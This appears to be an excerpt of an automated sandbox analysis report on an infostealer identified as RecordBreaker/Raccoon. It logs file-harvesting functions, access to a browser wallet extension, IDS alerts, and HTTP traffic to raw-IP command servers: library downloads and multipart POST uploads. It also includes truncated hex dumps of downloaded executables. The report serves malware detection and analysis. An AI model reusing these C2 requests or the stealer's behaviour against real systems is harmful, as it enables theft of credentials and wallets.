                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.6:49787 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49823 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.6:49915 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49920 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49942 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.6:50102 version: TLS 1.2
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
                    Source: Binary string: wextract.pdb source: captain09876.exe, 0000001C.00000000.325288251.00007FF7E2D99000.00000002.00000001.01000000.00000010.sdmp, captain09876.exe, 0000001C.00000002.824031126.00007FF7E2D99000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: wextract.pdbGCTL source: captain09876.exe, 0000001C.00000000.325288251.00007FF7E2D99000.00000002.00000001.01000000.00000010.sdmp, captain09876.exe, 0000001C.00000002.824031126.00007FF7E2D99000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: C:\wiroguzaxun\lefereyocimuwu-fep\22\wipo\57_so.pdb source: F0geI.exe, 0000000E.00000000.299494274.0000000000401000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: C:\Soboya xola sikine\nalac\Lohoc\Docamap.pdb source: q1wLT3xKiY.exe
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040ABD8 LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,14_2_0040ABD8
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,14_2_004052DA
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,FindClose,14_2_00405B5B
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040196E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,14_2_0040196E
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,14_2_0040B177
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00401B05 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose,14_2_00401B05
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose,14_2_0040AE06
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,14_2_00403C8F
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,14_2_00401E18
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040633E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW,14_2_0040633E
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,14_2_004039D7
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,14_2_00406725
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,16_2_004039D7
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,16_2_004052DA
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,16_2_00405B5B
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0040196E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,16_2_0040196E
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,16_2_0040B177
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00401B05 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindClose,16_2_00401B05
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,16_2_0040AE06
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,16_2_00403C8F
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,16_2_00401E18
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,16_2_00406725
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0040633E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,lstrlenW,16_2_0040633E

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2038485 ET TROJAN Win32/RecordBreaker - Observed UA M1 192.168.2.6:49800 -> 45.95.11.158:80
                    Source: TrafficSnort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.6:49800 -> 45.95.11.158:80
                    Source: TrafficSnort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 45.95.11.158:80 -> 192.168.2.6:49800
                    Source: TrafficSnort IDS: 2038487 ET TROJAN Win32/RecordBreaker - Library Request 192.168.2.6:49800 -> 45.95.11.158:80
                    Source: TrafficSnort IDS: 2038486 ET TROJAN Win32/RecordBreaker - Observed UA M2 192.168.2.6:49800 -> 45.95.11.158:80
                    Source: Yara matchFile source: Process Memory Space: SETUP_~1.EXE PID: 6132, type: MEMORYSTR
                    Source: global trafficTCP traffic: 103.89.90.61 ports 34589,3,4,5,8,9
                    Source: Yara matchFile source: 21.0.namdoitntn.exe.d30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED
                    Source: global trafficHTTP traffic detected: GET /1571 HTTP/1.1Host: 77.91.103.222
                    Source: global trafficHTTP traffic detected: GET /3610134416.zip HTTP/1.1Host: 77.91.103.222Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----9252178082817145Host: 77.91.103.222Content-Length: 30062Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /1616 HTTP/1.1Host: 88.198.122.116
                    Source: global trafficHTTP traffic detected: GET /3478722452.zip HTTP/1.1Host: 88.198.122.116Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----8726974166427610Host: 88.198.122.116Content-Length: 27286Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /1521 HTTP/1.1Host: 62.204.41.126
                    Source: global trafficHTTP traffic detected: GET /0659920757.zip HTTP/1.1Host: 62.204.41.126Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----9076747263460164Host: 62.204.41.126Content-Length: 27205Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:26:09 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:26:14 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:26:17 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 